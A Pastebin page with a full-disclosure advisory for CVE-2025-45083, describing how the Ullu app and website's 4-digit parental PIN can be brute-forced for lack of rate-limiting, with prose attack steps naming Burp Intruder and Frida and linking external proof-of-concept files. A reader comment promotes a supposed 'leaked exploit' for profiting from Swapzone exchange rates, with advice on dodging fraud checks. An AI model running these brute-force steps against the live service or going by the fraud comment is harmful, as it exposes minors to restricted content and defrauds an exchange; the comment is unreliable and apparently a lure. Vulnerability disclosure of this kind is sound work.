API tools faq
paste
H4cKr1337

CVE-2025-45083 - FULL DISCLOSURE

H4cKr1337
Jun 29th, 2025 (edited)
2,914
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.19 KB | None | 0 0
raw download clone embed print report
  1. CVE ASSIGNED: CVE-2025-45083
  2. CVE PUBLISHED STATE: PUBLISHED
  3. CVE LINK: https://nvd.nist.gov/vuln/detail/CVE-2025-45083
  4.  
  5. Description:
  6. An Incorrect Access Control vulnerability exists in Ullu App Android v2.9.929, iOS v2.8.0, and the Ullu Web Platform (https://ullu.app). The application's parental PIN protection feature can be bypassed by attackers via brute force techniques, due to the lack of rate-limiting or lockout mechanisms on PIN entry. This allows unauthorized users to disable the parental lock feature and gain unrestricted access to adult content on the platform.
  7.  
  8. For mobile apps, the 4-digit PIN can be brute-forced locally via (manually) or by intercepting using tools like Frida. For the web version, attackers can simply capture and replay the HTTP request for parental PIN disablement and automate a brute-force attack without triggering any defensive mechanism.
  9.  
  10.  
  11. Impact:
  12. 1.Bypass of Parental Controls, exposing restricted content to unauthorized users
  13. 2.Violation of content accessibility protections, especially for underage users
  14. 3.Escalation of privileges by circumventing access restrictions
  15. 4.Legal and compliance risks related to age-restricted content delivery
  16.  
  17. Attack Scenario:
  18. Web:
  19. 1.User navigates to https://ullu.app/
  20. 2.Captures the HTTP request sent when entering a parental PIN
  21. 3.Brute-forces the 4-digit PIN using automated scripts (e.g., via Burp Intruder or custom Python script)
  22. 4.Disables parental control without authorization
  23.  
  24. Android & iOS App:
  25. 1.Attacker installs the app
  26. 2.Logs in using leaked credentials for any account but gets blocked due to parental PIN protection.
  27. 3.Sends repeated PIN attempts until the correct one is identified (via Frida)
  28. 4.Alternatively, manually tries PINs within the app interface (0000–9999)
  29.  
  30. Technical Details:
  31. 1.Vulnerability Type: Incorrect Access Control
  32. 2.CWE Classification: CWE-284 – Improper Access Control
  33. 3.Attack Type: Remote (for web), Local/Remote (for apps)
  34.  
  35. Affected Versions:
  36. 1.Android App: v2.9.929 (Play Store)
  37. 2.IOS App: v2.8.0 (App Store)
  38. 3.Web Platform: https://ullu.app
  39.  
  40. Impact: Escalation of Privileges, Inappropriate Content Exposure
  41.  
  42. Affected Products:
  43. 1.Ullu Web Platform: https://ullu.app
  44. 2.Ullu Android App: https://play.google.com/store/apps/details?id=cdi.videostreaming.app (v2.9.929)
  45. 3.Ullu iOS App: https://apps.apple.com/us/app/ullu/id1435281792 (v2.8.0)
  46.  
  47. Vendor Information:
  48. 1.Vendor: Ullu
  49. 2.Website: https://ullu.app/
  50.  
  51. Proof of Concept (PoC):
  52. Web:
  53. 1.Intercept the HTTP request triggered by entering the parental PIN
  54. 2.Use a script or Burp Intruder to iterate through 0000–9999 PINs
  55. 3.Parental PIN is eventually disabled, and restricted content becomes accessible
  56. 4.POC for web at - https://drive.google.com/file/d/1gVZDcBDvkQzw12SKBvRYgcaQt4UoC_KP/view?usp=sharing
  57.  
  58. Apps (Android/iOS):
  59. 1.Use a proxy (e.g., Burp Suite) or local instrumentation (e.g., Frida)
  60. 2.Identify the endpoint or local logic verifying the PIN (Frida)
  61. 3.Iterate all 4-digit PIN combinations using automated input or request fuzzing
  62. 4.Successful PIN bypass results in unlocking adult content
  63. 5.POC for app at - https://drive.google.com/file/d/1-wUA6dNIMVbv-KV7ZUDnTtC4_avh5pGf/view?usp=sharing
  64.  
  65. Discoverer:
  66. Ishwar Kumar
Advertisement
Comments
  • btttid
    btttid
    5 hours
    # CSS 0.85 KB | 0 0
    view report reply
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!